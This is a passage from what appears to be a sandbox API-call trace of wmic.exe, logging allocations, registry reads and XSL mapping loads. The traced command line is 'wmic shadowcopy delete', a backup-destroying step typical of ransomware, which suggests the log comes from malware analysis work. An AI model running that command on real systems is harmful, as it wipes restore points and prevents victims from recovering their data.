Luid.HighPart=6357106, Attributes=0x46006d), (Luid.LowPart=0x730065, Luid.HighPart=4390973, Attributes=0x5c003a), (Luid.LowPart=0x67006f, Luid.HighPart=6357106, Attributes=0x20006d), (Luid.LowPart=0x65006c, Luid.HighPart=6029427, Attributes=0x6f0043))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0125.864] free (_Block=0x4763c0) [0125.864] CloseHandle (hObject=0xf4) returned 1 [0125.865] malloc (_Size=0x40) returned 0x4763c0 [0125.865] malloc (_Size=0x40) returned 0x476410 [0125.865] malloc (_Size=0x40) returned 0x476460 [0125.865] malloc (_Size=0x20a) returned 0x4764b0 [0125.865] GetSystemDirectoryW (in: lpBuffer=0x4764b0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.866] free (_Block=0x4764b0) [0125.866] malloc (_Size=0x18) returned 0x477fb0 [0125.866] malloc (_Size=0x18) returned 0x14dfb0 [0125.866] malloc (_Size=0x18) returned 0x4764b0 [0125.866] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0125.866] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0125.866] free (_Block=0x477fb0) [0125.866] free (_Block=0x14dfb0) [0125.866] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0125.866] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0125.867] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.867] FreeLibrary (hLibModule=0x77940000) returned 1 [0125.867] free (_Block=0x4764b0) [0125.867] _vsnwprintf (in: _Buffer=0x476460, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xcf348 | out: _Buffer="ms_409") returned 6 [0125.867] malloc (_Size=0x20) returned 0x4764b0 [0125.867] GetComputerNameW (in: lpBuffer=0x4764b0, nSize=0xcf720 | out: lpBuffer="XDUWTFONO", nSize=0xcf720) returned 1 [0125.868] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.868] malloc (_Size=0x14) returned 0x14dfb0 [0125.868] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.868] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xcf718 | out: lpNameBuffer=0x0, nSize=0xcf718) returned 0x7fffffde000 [0125.871] GetLastError () returned 0xea [0125.871] malloc (_Size=0x40) returned 0x4764e0 [0125.871] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x4764e0, nSize=0xcf718 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcf718) returned 0x1 [0125.872] lstrlenW (lpString="") returned 0 [0125.872] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.872] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0125.874] lstrlenW (lpString=".") returned 1 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0125.874] lstrlenW (lpString="LOCALHOST") returned 9 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0125.874] free (_Block=0x14dfb0) [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] malloc (_Size=0x14) returned 0x14dfb0 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] malloc (_Size=0x14) returned 0x477fb0 [0125.874] lstrlenW (lpString="XDUWTFONO") returned 9 [0125.874] malloc (_Size=0x8) returned 0x476530 [0125.874] malloc (_Size=0x18) returned 0x476550 [0125.875] malloc (_Size=0x30) returned 0x476570 [0125.875] malloc (_Size=0x18) returned 0x4765b0 [0125.875] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.875] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.875] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.875] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.875] malloc (_Size=0x30) returned 0x4765d0 [0125.875] malloc (_Size=0x18) returned 0x476610 [0125.875] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.875] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.875] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.875] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.875] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.875] SysStringLen (param_1="IMPERSONATE") returned 0xb [0125.875] malloc (_Size=0x30) returned 0x476630 [0125.875] malloc (_Size=0x18) returned 0x476670 [0125.875] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.875] SysStringLen (param_1="IDENTIFY") returned 0x8 [0125.875] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.875] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.875] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0125.875] SysStringLen (param_1="DELEGATE") returned 0x8 [0125.875] malloc (_Size=0x30) returned 0x476690 [0125.875] malloc (_Size=0x18) returned 0x4766d0 [0125.875] malloc (_Size=0x30) returned 0x4766f0 [0125.875] malloc (_Size=0x18) returned 0x476730 [0125.875] SysStringLen (param_1="NONE") returned 0x4 [0125.875] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.875] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.875] SysStringLen (param_1="NONE") returned 0x4 [0125.875] malloc (_Size=0x30) returned 0x476750 [0125.875] malloc (_Size=0x18) returned 0x476790 [0125.876] SysStringLen (param_1="CONNECT") returned 0x7 [0125.876] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.876] malloc (_Size=0x30) returned 0x4767b0 [0125.876] malloc (_Size=0x18) returned 0x4767f0 [0125.876] SysStringLen (param_1="CALL") returned 0x4 [0125.876] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.876] SysStringLen (param_1="CALL") returned 0x4 [0125.876] SysStringLen (param_1="CONNECT") returned 0x7 [0125.876] malloc (_Size=0x30) returned 0x476810 [0125.876] malloc (_Size=0x18) returned 0x476850 [0125.876] SysStringLen (param_1="PKT") returned 0x3 [0125.876] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.876] SysStringLen (param_1="PKT") returned 0x3 [0125.876] SysStringLen (param_1="NONE") returned 0x4 [0125.876] SysStringLen (param_1="NONE") returned 0x4 [0125.876] SysStringLen (param_1="PKT") returned 0x3 [0125.876] malloc (_Size=0x30) returned 0x476870 [0125.876] malloc (_Size=0x18) returned 0x4768b0 [0125.876] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.876] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.876] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.876] SysStringLen (param_1="NONE") returned 0x4 [0125.876] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.876] SysStringLen (param_1="PKT") returned 0x3 [0125.876] SysStringLen (param_1="PKT") returned 0x3 [0125.876] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.876] malloc (_Size=0x30) returned 0x478000 [0125.877] malloc (_Size=0x18) returned 0x476cd0 [0125.877] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.877] SysStringLen (param_1="DEFAULT") returned 0x7 [0125.877] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.877] SysStringLen (param_1="PKT") returned 0x3 [0125.877] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.877] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.877] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0125.877] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0125.877] malloc (_Size=0x30) returned 0x478040 [0125.877] malloc (_Size=0x40) returned 0x476cf0 [0125.877] malloc (_Size=0x20a) returned 0x478fd0 [0125.877] GetSystemDirectoryW (in: lpBuffer=0x478fd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.877] free (_Block=0x478fd0) [0125.877] malloc (_Size=0x18) returned 0x476d40 [0125.877] malloc (_Size=0x18) returned 0x476d60 [0125.877] malloc (_Size=0x18) returned 0x476d80 [0125.877] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0125.877] SysStringLen (param_1="\\wbem\\") returned 0x6 [0125.877] free (_Block=0x476d40) [0125.878] free (_Block=0x476d60) [0125.878] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0125.878] free (_Block=0x476d80) [0125.878] malloc (_Size=0x18) returned 0x476d40 [0125.878] malloc (_Size=0x18) returned 0x476d60 [0125.878] malloc (_Size=0x18) returned 0x476d80 [0125.878] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0125.878] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0125.878] free (_Block=0x476d40) [0125.878] free (_Block=0x476d60) [0125.878] GetCurrentThreadId () returned 0x2dc [0125.878] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xcf020 | out: phkResult=0xcf020*=0xf8) returned 0x0 [0125.878] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xcf070, lpcbData=0xcf010*=0x400 | out: lpType=0x0, lpData=0xcf070*=0x30, lpcbData=0xcf010*=0x4) returned 0x0 [0125.878] _wcsicmp (_String1="0", _String2="1") returned -1 [0125.878] _wcsicmp (_String1="0", _String2="2") returned -2 [0125.878] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xcf010*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xcf010*=0x42) returned 0x0 [0125.878] malloc (_Size=0x86) returned 0x476da0 [0125.878] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x476da0, lpcbData=0xcf010*=0x42 | out: lpType=0x0, lpData=0x476da0*=0x25, lpcbData=0xcf010*=0x42) returned 0x0 [0125.878] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0125.878] malloc (_Size=0x42) returned 0x476e30 [0125.879] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0125.879] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xcf070, lpcbData=0xcf010*=0x400 | out: lpType=0x0, lpData=0xcf070*=0x36, lpcbData=0xcf010*=0xc) returned 0x0 [0125.879] _wtol (_String="65536") returned 65536 [0125.879] free (_Block=0x476da0) [0125.879] RegCloseKey (hKey=0x0) returned 0x6 [0125.879] CoCreateInstance (in: rclsid=0xffb87410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xffb873f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xcf518 | out: ppv=0xcf518*=0x1f571d0) returned 0x0 [0126.160] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x1f571d0, xmlSource=0xcf660*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x476d40), isSuccessful=0xcf6d0 | out: isSuccessful=0xcf6d0*=0xffff) returned 0x0 [0132.785] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x1f571d0, DOMElement=0xcf510 | out: DOMElement=0xcf510) returned 0x0 [0132.785] malloc (_Size=0x18) returned 0x476d40 [0132.788] free (_Block=0x476d40) [0132.790] malloc (_Size=0x18) returned 0x476d40 [0132.790] free (_Block=0x476d40) [0132.790] malloc (_Size=0x18) returned 0x476d40 [0132.790] malloc (_Size=0x18) returned 0x476d60 [0132.791] malloc (_Size=0x30) returned 0x478080 [0132.791] malloc (_Size=0x18) returned 0x476e80 [0132.791] free (_Block=0x476e80) [0132.791] malloc (_Size=0x18) returned 0x47c270 [0132.791] malloc (_Size=0x18) returned 0x47c290 [0132.791] SysStringLen (param_1="VALUE") returned 0x5 [0132.791] SysStringLen (param_1="TABLE") returned 0x5 [0132.791] SysStringLen (param_1="TABLE") returned 0x5 [0132.791] SysStringLen (param_1="VALUE") returned 0x5 [0132.791] malloc (_Size=0x30) returned 0x4780c0 [0132.792] malloc (_Size=0x18) returned 0x47c2b0 [0132.792] free (_Block=0x47c2b0) [0132.792] malloc (_Size=0x18) returned 0x47c2b0 [0132.792] malloc (_Size=0x18) returned 0x47c2d0 [0132.792] SysStringLen (param_1="LIST") returned 0x4 [0132.792] SysStringLen (param_1="TABLE") returned 0x5 [0132.792] malloc (_Size=0x30) returned 0x478100 [0132.792] malloc (_Size=0x18) returned 0x47c2f0 [0132.792] free (_Block=0x47c2f0) [0132.792] malloc (_Size=0x18) returned 0x47c2f0 [0132.792] malloc (_Size=0x18) returned 0x47c310 [0132.792] SysStringLen (param_1="RAWXML") returned 0x6 [0132.792] SysStringLen (param_1="TABLE") returned 0x5 [0132.793] SysStringLen (param_1="RAWXML") returned 0x6 [0132.793] SysStringLen (param_1="LIST") returned 0x4 [0132.793] SysStringLen (param_1="LIST") returned 0x4 [0132.793] SysStringLen (param_1="RAWXML") returned 0x6 [0132.793] malloc (_Size=0x30) returned 0x478140 [0132.793] malloc (_Size=0x18) returned 0x47c330 [0132.793] free (_Block=0x47c330) [0132.793] malloc (_Size=0x18) returned 0x47c330 [0132.793] malloc (_Size=0x18) returned 0x47c350 [0132.793] SysStringLen (param_1="HTABLE") returned 0x6 [0132.793] SysStringLen (param_1="TABLE") returned 0x5 [0132.793] SysStringLen (param_1="HTABLE") returned 0x6 [0132.793] SysStringLen (param_1="LIST") returned 0x4 [0132.793] malloc (_Size=0x30) returned 0x478180 [0132.793] malloc (_Size=0x18) returned 0x47c370 [0132.794] free (_Block=0x47c370) [0132.794] malloc (_Size=0x18) returned 0x47c370 [0132.794] malloc (_Size=0x18) returned 0x47c390 [0132.794] SysStringLen (param_1="HFORM") returned 0x5 [0132.794] SysStringLen (param_1="TABLE") returned 0x5 [0132.794] SysStringLen (param_1="HFORM") returned 0x5 [0132.794] SysStringLen (param_1="LIST") returned 0x4 [0132.794] SysStringLen (param_1="HFORM") returned 0x5 [0132.794] SysStringLen (param_1="HTABLE") returned 0x6 [0132.794] malloc (_Size=0x30) returned 0x4781c0 [0132.794] malloc (_Size=0x18) returned 0x47c3b0 [0132.794] free (_Block=0x47c3b0) [0132.794] malloc (_Size=0x18) returned 0x47c3b0 [0132.794] malloc (_Size=0x18) returned 0x47c3d0 [0132.794] SysStringLen (param_1="XML") returned 0x3 [0132.794] SysStringLen (param_1="TABLE") returned 0x5 [0132.794] SysStringLen (param_1="XML") returned 0x3 [0132.794] SysStringLen (param_1="VALUE") returned 0x5 [0132.794] SysStringLen (param_1="VALUE") returned 0x5 [0132.795] SysStringLen (param_1="XML") returned 0x3 [0132.795] malloc (_Size=0x30) returned 0x478200 [0132.795] malloc (_Size=0x18) returned 0x47c3f0 [0132.795] free (_Block=0x47c3f0) [0132.795] malloc (_Size=0x18) returned 0x47c3f0 [0132.795] malloc (_Size=0x18) returned 0x47c410 [0132.795] SysStringLen (param_1="MOF") returned 0x3 [0132.795] SysStringLen (param_1="TABLE") returned 0x5 [0132.795] SysStringLen (param_1="MOF") returned 0x3 [0132.795] SysStringLen (param_1="LIST") returned 0x4 [0132.795] SysStringLen (param_1="MOF") returned 0x3 [0132.795] SysStringLen (param_1="RAWXML") returned 0x6 [0132.795] SysStringLen (param_1="LIST") returned 0x4 [0132.795] SysStringLen (param_1="MOF") returned 0x3 [0132.795] malloc (_Size=0x30) returned 0x478240 [0132.796] malloc (_Size=0x18) returned 0x47c430 [0132.796] free (_Block=0x47c430) [0132.796] malloc (_Size=0x18) returned 0x47c430 [0132.796] malloc (_Size=0x18) returned 0x47c450 [0132.796] SysStringLen (param_1="CSV") returned 0x3 [0132.796] SysStringLen (param_1="TABLE") returned 0x5 [0132.796] SysStringLen (param_1="CSV") returned 0x3 [0132.796] SysStringLen (param_1="LIST") returned 0x4 [0132.796] SysStringLen (param_1="CSV") returned 0x3 [0132.796] SysStringLen (param_1="HTABLE") returned 0x6 [0132.796] SysStringLen (param_1="CSV") returned 0x3 [0132.796] SysStringLen (param_1="HFORM") returned 0x5 [0132.796] malloc (_Size=0x30) returned 0x478280 [0132.796] malloc (_Size=0x18) returned 0x47c470 [0132.796] free (_Block=0x47c470) [0132.796] malloc (_Size=0x18) returned 0x47c470 [0132.797] malloc (_Size=0x18) returned 0x47c490 [0132.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.797] SysStringLen (param_1="TABLE") returned 0x5 [0132.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.797] SysStringLen (param_1="VALUE") returned 0x5 [0132.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.797] SysStringLen (param_1="XML") returned 0x3 [0132.797] SysStringLen (param_1="XML") returned 0x3 [0132.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.797] malloc (_Size=0x30) returned 0x4782c0 [0132.797] malloc (_Size=0x18) returned 0x47c4b0 [0132.797] free (_Block=0x47c4b0) [0132.797] malloc (_Size=0x18) returned 0x47c4b0 [0132.797] malloc (_Size=0x18) returned 0x47c4d0 [0132.797] SysStringLen (param_1="texttablewsys") returned 0xd [0132.797] SysStringLen (param_1="TABLE") returned 0x5 [0132.797] SysStringLen (param_1="texttablewsys") returned 0xd [0132.797] SysStringLen (param_1="XML") returned 0x3 [0132.797] SysStringLen (param_1="texttablewsys") returned 0xd [0132.797] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.797] SysStringLen (param_1="XML") returned 0x3 [0132.797] SysStringLen (param_1="texttablewsys") returned 0xd [0132.797] malloc (_Size=0x30) returned 0x478300 [0132.798] malloc (_Size=0x18) returned 0x47c4f0 [0132.798] free (_Block=0x47c4f0) [0132.798] malloc (_Size=0x18) returned 0x47c4f0 [0132.798] malloc (_Size=0x18) returned 0x47c510 [0132.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.798] SysStringLen (param_1="TABLE") returned 0x5 [0132.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.798] SysStringLen (param_1="XML") returned 0x3 [0132.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.798] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.798] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.798] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.798] malloc (_Size=0x30) returned 0x478340 [0132.798] malloc (_Size=0x18) returned 0x47c530 [0132.798] free (_Block=0x47c530) [0132.798] malloc (_Size=0x18) returned 0x47c530 [0132.798] malloc (_Size=0x18) returned 0x47c550 [0132.799] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.799] SysStringLen (param_1="TABLE") returned 0x5 [0132.799] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.799] SysStringLen (param_1="XML") returned 0x3 [0132.799] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.799] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.799] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.799] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.799] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.799] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.799] malloc (_Size=0x30) returned 0x478380 [0132.799] malloc (_Size=0x18) returned 0x47c570 [0132.799] free (_Block=0x47c570) [0132.799] malloc (_Size=0x18) returned 0x47c570 [0132.799] malloc (_Size=0x18) returned 0x47c590 [0132.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.799] SysStringLen (param_1="TABLE") returned 0x5 [0132.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.799] SysStringLen (param_1="XML") returned 0x3 [0132.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.799] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.799] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.800] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.800] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.800] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.800] malloc (_Size=0x30) returned 0x4783c0 [0132.800] malloc (_Size=0x18) returned 0x47c5b0 [0132.800] free (_Block=0x47c5b0) [0132.800] malloc (_Size=0x18) returned 0x47c5b0 [0132.800] malloc (_Size=0x18) returned 0x47c5d0 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.800] SysStringLen (param_1="TABLE") returned 0x5 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.800] SysStringLen (param_1="XML") returned 0x3 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.800] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.800] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.800] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.800] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.800] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0132.801] malloc (_Size=0x30) returned 0x478400 [0132.801] malloc (_Size=0x18) returned 0x47c5f0 [0132.801] free (_Block=0x47c5f0) [0132.801] malloc (_Size=0x18) returned 0x47c5f0 [0132.801] malloc (_Size=0x18) returned 0x47c610 [0132.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.801] SysStringLen (param_1="TABLE") returned 0x5 [0132.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.801] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.801] SysStringLen (param_1="XML") returned 0x3 [0132.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.801] SysStringLen (param_1="texttablewsys") returned 0xd [0132.801] SysStringLen (param_1="XML") returned 0x3 [0132.801] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.801] malloc (_Size=0x30) returned 0x478440 [0132.801] malloc (_Size=0x18) returned 0x47c630 [0132.802] free (_Block=0x47c630) [0132.802] malloc (_Size=0x18) returned 0x47c630 [0132.802] malloc (_Size=0x18) returned 0x47c650 [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] SysStringLen (param_1="TABLE") returned 0x5 [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] SysStringLen (param_1="XML") returned 0x3 [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] SysStringLen (param_1="texttablewsys") returned 0xd [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0132.802] SysStringLen (param_1="XML") returned 0x3 [0132.802] SysStringLen (param_1="htable-sortby") returned 0xd [0132.802] malloc (_Size=0x30) returned 0x478480 [0132.802] malloc (_Size=0x18) returned 0x47c670 [0132.802] free (_Block=0x47c670) [0132.802] malloc (_Size=0x18) returned 0x47c670 [0132.802] malloc (_Size=0x18) returned 0x47c690 [0132.802] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.802] SysStringLen (param_1="TABLE") returned 0x5 [0132.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.803] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.803] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.803] malloc (_Size=0x30) returned 0x4784c0 [0132.803] malloc (_Size=0x18) returned 0x47c6b0 [0132.803] free (_Block=0x47c6b0) [0132.803] malloc (_Size=0x18) returned 0x47c6b0 [0132.803] malloc (_Size=0x18) returned 0x47c6d0 [0132.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.803] SysStringLen (param_1="TABLE") returned 0x5 [0132.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.803] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.803] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0132.803] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.803] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0132.803] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.804] SysStringLen (param_1="wmiclimofformat") returned 0xf [0132.804] malloc (_Size=0x30) returned 0x478500 [0132.804] malloc (_Size=0x18) returned 0x47c6f0 [0132.804] free (_Block=0x47c6f0) [0132.804] malloc (_Size=0x18) returned 0x47c6f0 [0132.804] malloc (_Size=0x18) returned 0x47c710 [0132.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.804] SysStringLen (param_1="TABLE") returned 0x5 [0132.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.804] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.804] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.804] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.804] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.804] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.804] malloc (_Size=0x30) returned 0x478540 [0132.804] malloc (_Size=0x18) returned 0x47c730 [0132.805] free (_Block=0x47c730) [0132.805] malloc (_Size=0x18) returned 0x47c730 [0132.805] malloc (_Size=0x18) returned 0x47c750 [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] SysStringLen (param_1="TABLE") returned 0x5 [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0132.805] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0132.805] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0132.805] malloc (_Size=0x30) returned 0x478580 [0132.805] FreeThreadedDOMDocument:IUnknown:Release (This=0x1f571d0) returned 0x0 [0132.805] free (_Block=0x476d80) [0132.805] GetCommandLineW () returned="wmic shadowcopy delete" [0132.806] malloc (_Size=0x30) returned 0x4785c0 [0132.807] memcpy_s (in: _Destination=0x4785c0, _DestinationSize=0x2e, _Source=0x2425ec, _SourceSize=0x2e | out: _Destination=0x4785c0) returned 0x0 [0132.807] malloc (_Size=0x18) returned 0x47c770 [0132.807] malloc (_Size=0x18) returned 0x47c790 [0132.807] malloc (_Size=0x18) returned 0x47c7b0 [0132.807] malloc (_Size=0x18) returned 0x47c7d0 [0132.807] malloc (_Size=0x80) returned 0x476d80 [0132.807] GetLocalTime (in: lpSystemTime=0xcf6b0 | out: lpSystemTime=0xcf6b0*(wYear=0x7e4, wMonth=0x8, wDayOfWeek=0x6, wDay=0x8, wHour=0x4, wMinute=0x32, wSecond=0x2b, wMilliseconds=0xc8)) [0132.807] _vsnwprintf (in: _Buffer=0x476d80, _BufferCount=0x3f, 